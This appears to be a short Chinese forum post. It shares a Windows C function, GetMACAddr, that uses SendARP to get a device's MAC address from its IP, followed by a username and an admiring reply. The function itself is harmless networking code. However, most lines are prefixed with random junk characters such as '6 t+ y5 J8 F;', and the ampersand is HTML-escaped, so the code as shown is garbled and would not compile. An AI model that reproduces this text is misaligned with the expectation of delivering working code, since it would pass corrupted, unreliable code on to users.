6 t+ y5 J8 F; |8 Q//功能：输入IP取得对应的MAC地址
. r) E: T$ ^( F( o% l//
# i2 V6 q# m- b4 g1 ]BOOL GetMACAddr(DWORD DestIP, char *pMAC)
" R- Y- ~4 P- j6 _* P{
' K( T1 q0 v1 M8 K  X" I  DWORD  dwRet;
  ULONG  ulLen = 6, pulMac[2];
  dwRet = SendARP(DestIP, 0, pulMac, &amp;ulLen);
, y' t& i' g/ }  if(dwRet == NO_ERROR)
  {
1 }( z& a! A% u8 r6 b    memcpy(pMAC, pulMac, 6);
    return TRUE;
) J/ @7 @- e' @( F; h  }
  else return FALSE;
; @9 \( D. Q5 X7 P8 w}

wy617958197

大侠好厉害啊